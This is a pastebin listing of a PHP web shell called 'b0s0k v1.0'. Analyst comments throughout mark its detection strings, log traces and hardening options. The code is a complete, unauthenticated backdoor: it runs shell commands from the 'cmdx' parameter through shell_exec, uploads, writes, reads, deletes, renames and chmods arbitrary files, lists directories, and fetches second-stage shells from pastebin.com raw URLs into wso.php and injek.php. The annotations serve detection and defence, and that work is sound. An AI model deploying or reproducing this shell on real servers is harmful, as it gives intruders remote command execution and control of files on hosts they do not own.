alin_tamvanz

b0s0k shell

Mar 14th, 2016
  1. <?php
  // Analyst note: this listing is a PHP web shell; the page it renders titles itself
  // "b0s0k v1.0". Nothing in the visible script checks a password, session or source
  // address before the request handlers further down run.
  2.  
  // Turns PHP error reporting off and removes the execution time limit. The leading
  // "@" also suppresses any warning raised by these two calls themselves.
  3. @error_reporting(0);
  4. @set_time_limit(0);
  5.  
  6.  
  // Emits the page header. Static strings usable as content signatures when hunting
  // for this file on disk or in responses: the <title> "b0s0k v1.0" and the
  // externally hosted image URL in the <img> tag. Because the image is remote, a
  // browser opening this page also sends a request to that third-party host.
  7. echo"
  8. <html>
  9. <head>
  10. <title>b0s0k v1.0</title>
  11. </head>
  12. <body bgcolor=\"#708090\">
  13. <table border=\"1\" width=\"100%\" height=\"100%\">
  14. <tr>
  15. <td width=\"300px\" height=\"100px\">
  16. <table><tr><td width=300>
  17. <img src=\"http://sman24kabtangerang.sch.id/file/bosok.png\" width=\"200\" height=\"200\">
  18. </pre></td></tr></table>
  19. </td>";
  // Upload handler. The destination directory comes from POST field "locup" and the
  // file name from the client-supplied $_FILES['file']['name']; both are concatenated
  // and passed to copy() as-is. No extension, content-type or path check is visible.
  // Defender view: this only succeeds where the web-server account can write, so
  // read-only code directories and no script execution in writable ones limit it.
  20. $path = $_POST['locup'];
  21. if(isset($_FILES['file'])){
  22. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  23. echo "<script>alert('Upload Done!')</script>";
  24. }else{
  25. echo "<script>alert('Upload Failed!')</script>";
  26. }
  27. }
  // Directory creation: when POST field "snewd" (the submit button) is present,
  // mkdir() is called on the request-supplied path in "newd" and the result is
  // reported through a JavaScript alert.
  28. if(isset($_POST['snewd'])){
  29.     if(mkdir($_POST['newd'])){
  30.         echo"<script>alert('Done!')</script>";
  31.     }else{
  32.         echo"<script>alert('Failed!')</script>";
  33.     }
  34. }
  // $candir is assigned here but is not referenced anywhere else in this listing.
  35. if($_GET['sd']){
  36.     $candir = $_POST['sd'];
  37. }
  // Renders the upload and "New dir" forms. Both text inputs are pre-filled with
  // getcwd(), so the rendered page discloses the server-side working directory.
  // The banner text "shell coded by : shutdown57" is another static string that can
  // be matched when scanning web roots for this file.
  38. echo"
  39. <td width=\"800px\" height=\"100px\">
  40. <font color=\"red\">b0s0k</font><font color=\"white\"> shell coded by : shutdown57</font>
  41. <table border=\"1\">
  42. <tr><td colspan=\"4\">
  43. <fieldset><legend>Upload Area</legend>
  44. <form enctype=\"multipart/form-data\" method=\"POST\">
  45. Upload File : <input type=\"file\" name=\"file\" />
  46. Location :<input type=\"text\" value=\"".getcwd()."\"  name=\"locup\">
  47. <input type=\"submit\" value=\"upload\"  />
  48. </form>
  49. </fieldset>
  50. </td></tr>
  51. <tr><td width=50%>
  52. <form method=\"post\">
  53. New dir :<input type=\"text\" value=\"".getcwd()."/NewDir\" name=\"newd\"><input type=\"submit\" value=\"==>\" name=\"snewd\">
  54. </form></td>";
  // Same "snewd" check and mkdir() call as the handler that appears earlier in the
  // listing (gutter lines 28-34).
  55. if(isset($_POST['snewd'])){
  56.     if(mkdir($_POST['newd'])){
  57.         echo"<script>alert('Done!')</script> ";
  58.     }else{
  59.         echo"<script>alert('Failed')</script>";
  60.     }
  61. }
  // Renders the "Delete dir" form, pre-filled with getcwd()."/dir".
  62. echo"
  63. <td>
  64. <form method=\"post\">
  65. Delete dir :<input type=\"text\" value=\"".getcwd()."/dir\" name=\"deld\"><input type=\"submit\" value=\"==>\" name=\"sdeld\">
  66. </form>
  67. </td>
  68. </td></tr>";
  // Directory removal: rmdir() on the request-supplied path in POST field "deld",
  // triggered by the "sdeld" submit field. The path is not restricted to any base
  // directory by this script.
  69. if(isset($_POST['sdeld'])){
  70.     if(rmdir($_POST['deld'])){
  71.         echo"<script>alert('Done!')</script>";
  72.     }else{
  73.         echo"<script>alert('Failed')</script>";
  74.     }
  75. }
  // Renders the directory-scan form (GET parameter "s57"), pre-filled with getcwd().
  76. echo"<tr>
  77. <td colspan=\"3\">
  78. <form method=\"get\">
  79. sc4nd1r :
  80. <input type=\"text\" value=\"".getcwd()."\" name=\"s57\" style=\"width:90%\"><input type=\"submit\" value=\"==>\"></td></tr><td colspan=\"3\">
  81. Current Path :";
  // Path to display: the "s57" query parameter when present, otherwise the current
  // working directory.
  82. if(isset($_GET['s57'])){
  83. $path = $_GET['s57'];
  84. }else{
  85. $path = getcwd();
  86. }
  // Normalise backslashes to forward slashes, then split the path into components.
  87. $path = str_replace('\\','/',$path);
  88. $paths = explode('/',$path);
  89.  
  // Prints the path as a chain of links, one per component, each pointing back at
  // this script with ?s57=<path up to that component>. The components are echoed
  // into the href and the link text without htmlspecialchars(). $a is set for a
  // leading "/" but is not read again in this listing.
  90. foreach($paths as $id=>$pat){
  91. if($pat == '' && $id == 0){
  92. $a = true;
  93. echo '<a href="?s57=/">/</a>';
  94. continue;
  95. }
  96. if($pat == '') continue;
  97. echo '<a href="?s57=';
  98. for($i=0;$i<=$id;$i++){
  99. echo "$paths[$i]";
  100. if($i != $id) echo "/";
  101. }
  102. echo '">'.$pat.'</a>/';
  103. }
  // Renders the left-hand menu: links "?shell=injection" and "?shell=wso", a
  // "View file" form (GET "vf"), a command form (GET "cmdx", default value "uname")
  // and a "Delete file" form (POST "delf"/"sdelf"). These parameter names are the
  // ones to look for in request logs when reviewing a host where this file was found.
  104. echo"</td><td><p style=\"transform:rotate(10deg)\">b0s0k v1.0</td></tr>
  105. </form></td></tr>
  106. </table>
  107.  
  108.  
  109. </td></tr>
  110. <tr>
  111. <td>
  112.  
  113. <table border=\"1\">
  114. <tr><td>
  115. <a href=\"?shell=injection\">1n73ction</a>
  116. </td></tr>
  117. <tr><td>
  118. <a href=\"?shell=wso\">WSO</a></td></tr>
  119. <tr><td> <form method=\"get\">
  120. View file:<input type=\"text\" value=\"".getcwd()."/index.php\" name=\"vf\" style=\"margin-top:0;\"><input type=\"submit\" value=\"==>\" ></form></td></tr>
  121. <tr><td>
  122. command;<form method=\"get\">
  123. <input type=\"text\" value=\"uname\" name=\"cmdx\" style=\"margin-top:0;\"><input type=\"submit\" value=\"==>\" ></form></td></tr>
  124. <tr><td colspan=\"2\">
  125.  
  126. <form method=\"post\">
  127. Delete file:<input type=\"text\" value=\"".getcwd()."/file.php\" name=\"delf\"><input type=\"submit\" value=\"==>\" name=\"sdelf\">
  128. </form>
  129. </td></tr>";
  // File deletion: unlink() on the request-supplied path in POST field "delf".
  // POST bodies are usually absent from default access logs, so evidence of use is
  // more likely in file-system timestamps or integrity monitoring than in the
  // request line.
  130. if(isset($_POST['sdelf'])){
  131.     if(unlink($_POST['delf'])){
  132.         echo"<script>alert('Done!')</script>";
  133.     }else{
  134.         echo"<script>alert('Failed!')</script>";
  135.     }
  136. }
  // Renders the "new file" form: a textarea ("newf") and a target path ("sf") that
  // defaults to getcwd()."/s57.php".
  137. echo"<tr><td colspan=\"2\">
  138. <form method=\"post\">
  139. <textarea name=\"newf\" style=\"width:100%;height:170px;\">
  140. //New File Here
  141. </textarea>
  142. save as :<input type=\"text\" value=\"".getcwd()."/s57.php\" name=\"sf\" width=\"80%\">
  143. <input type=\"submit\" value=\"==>\" name=\"ssf\">
  144.  
  145. </form>
  146. </td></tr>";
  // Arbitrary file write: opens the request-supplied path in append mode ("a+") and
  // writes the raw "newf" body to it. The fopen() result is not checked before
  // fwrite()/fclose(). Defender view: unexpected new or grown .php files under the
  // web root (the form's default name is s57.php) are the artefact to look for.
  147. if(isset($_POST['ssf'])){
  148.     $fpx = fopen($_POST['sf'],"a+");
  149.     if(fwrite($fpx,$_POST['newf'])){
  150.         echo"<script>alert('Done!')</script>";
  151.     }else{
  152.         echo"<script>alert('Failed!')</script>";
  153.     }
  154.     fclose($fpx);
  155. }
  // Renders the "ChMod area" form with text fields "fc" and "ch" and submit "sch".
  156. echo"
  157. <tr><td><fieldset> <legend>ChMod area</legend>
  158. <form method=\"post\">
  159. file :<input type=\"text\" name=\"fc\">
  160. Perms:<input type=\"text\" name=\"ch\"><br>
  161. <input type=\"submit\" value=\"Change\" name=\"sch\">
  162. </form>
  163. </fieldset>
  164. </td></tr>";
  // Permission change: when "sch" is posted, chmod() is called with $_POST['fx'] as
  // the path and $_POST['ch'] as the mode, both taken from the request unmodified.
  165. if(isset($_POST['sch'])){
  166.     if(chmod($_POST['fx'],$_POST['ch'])){
  167.         echo"<script>alert('Done!')</script>";
  168.     }else{
  169.         echo"<script>alert('Failed')</script>";
  170.     }
  171. }
  172.  
  // Renders the "ReName Area" form with text fields "old" and "new" and submit "srn".
  173. echo"
  174. <tr><td><fieldset><legend>ReName Area</legend>
  175. <form method=\"post\">
  176. Old :<input type=\"text\" name=\"old\">
  177. New :<input type=\"text\" name=\"new\"><br>
  178. <input type=\"submit\" value=\"Change\" name=\"srn\">
  179. </fieldset></form></td></tr>
  180. </table>";
  // Rename/move: rename() with both source and destination paths taken from the
  // request. Nothing here confines either path to a particular directory.
  181. if(isset($_POST['srn'])){
  182.     if(rename($_POST['old'],$_POST['new'])){
  183.         echo"<script>alert('Done!')</script>";
  184.     }else{
  185.         echo"<script>alert('Failed!')</script>";
  186.     }
  187. }
  // Opens the right-hand output cell.
  188. echo"
  189. </td>
  190. <td width=\"80%\">
  191. ";
  // File read: prints the contents of the path given in GET "vf", HTML-escaped,
  // inside <pre>. Any file readable by the PHP process can be requested; the script
  // applies no allow-list. An open_basedir restriction in PHP's configuration is
  // the kind of control that narrows what file_get_contents() can reach.
  192. if($_GET['vf']){
  193. echo"<pre>".htmlspecialchars(file_get_contents($_GET['vf']))."</pre>";
  194. }
  // Command execution: GET "cmdx" is passed to shell_exec() unmodified. The call
  // appears twice (once as the if-condition, once for the echoed output), so the
  // command runs two times per request. Output is prefixed with the fixed string
  // "root@b0s0k~#:" regardless of the account PHP actually runs as. On a falsy
  // result the parameter is echoed back without HTML escaping.
  // Defender view: the form uses GET, so the command text appears in the request
  // line of web access logs ("cmdx="); shell_exec can be blocked via the php.ini
  // disable_functions directive.
  195. if($_GET['cmdx']){
  196.     echo"<pre>"; if(shell_exec($_GET['cmdx'])){
  197.     echo"root@b0s0k~#:".shell_exec($_GET['cmdx'])."";
  198.     }else{
  199.         echo"root@b0s0k~#:<font color='red'>".$_GET['cmdx'].";</font>Command Not Found!";
  200.     }
  201. }
  // Second-stage download ("?shell=wso"): fetches the pastebin.com raw URL below with
  // file_get_contents(), appends the response to the relative path wso.php (mode
  // "a+"), and on a successful write loads that file in an iframe. The downloaded
  // content is not part of this listing; going by the name it is presumably a copy
  // of the WSO web shell (unconfirmed). Neither the fopen() nor the download result
  // is checked before fwrite().
  // Defender view: indicators are an outbound HTTP request from the web server to
  // pastebin.com and a newly created wso.php beside this script. Fetching a URL
  // through file_get_contents() depends on allow_url_fopen being enabled.
  202. if($_GET['shell'] =='wso'){
  203.     $fpshell = fopen('wso.php','a+');
  204.     $shell = file_get_contents('http://pastebin.com/raw/cuWAmsUE');
  205.     if(fwrite($fpshell,$shell)){echo"<script>alert('Done!')</script>
  206.     <iframe src=\"wso.php\" width=\"100%\" height=\"100%\"></iframe>
  207.     ";}else{
  208.         echo"<script>alert('Failed')</script>";
  209.     }
  210.     fclose($fpshell);
  211.    
  212.     }
  // Second-stage download ("?shell=injection"): same pattern with a different
  // pastebin.com raw URL, appended to injek.php and loaded in an iframe. The fetched
  // content is likewise not visible here.
  213.     if($_GET['shell'] == 'injection'){
  214.         $isib = file_get_contents("http://pastebin.com/raw/KXHAYEj7");
  215.         $fpb = fopen('injek.php','a+');
  216.         if(fwrite($fpb,$isib)){
  217.             echo"<script>alert('Done!')</script>
  218.             <iframe src='injek.php' width='100%' height='100%'></iframe>";
  219.         }else{
  220.             echo"<script>alert('Failed!')</script>";
  221.         }   }
  222.  
  // Closes the command-output <pre> and opens a new one for the directory listing.
  223. echo"</pre>
  224. <pre>
  225. ";
  // Directory listing: print_r() of scandir() on the path given in GET "s57". Any
  // directory readable by the PHP process can be enumerated; the output is not
  // HTML-escaped. Requests carrying "s57=" in the query string are the log trace.
  226. if($_GET['s57']){
  227. print_r(scandir($_GET['s57']));}
  228. echo"
  229. </td>
  230. </tr></table>
  231. ";
  // Emits the inline stylesheet for the page. Presentation only: this statement
  // reads no request data and performs no file or process operation.
  232. echo"<style type=\"text/css\">
  233. body{color:#000;}
  234. input[type=\"submit\"]{
  235.     color:#eee;
  236.     background:#789;
  237.     border:1px outset #fff;
  238. }
  239. input[type=\"text\"]{
  240.     color:#eee;
  241.     background:#789;
  242.     border:1px inset #fff;
  243. }
  244. textarea{
  245.     color:#eee;
  246.     background:#789;
  247.     border:1px inset #fff;
  248. }
  249. a{color:#f00;border-bottom:1px inset #fff;}
  250. </style>
  251. ";
  252. ?>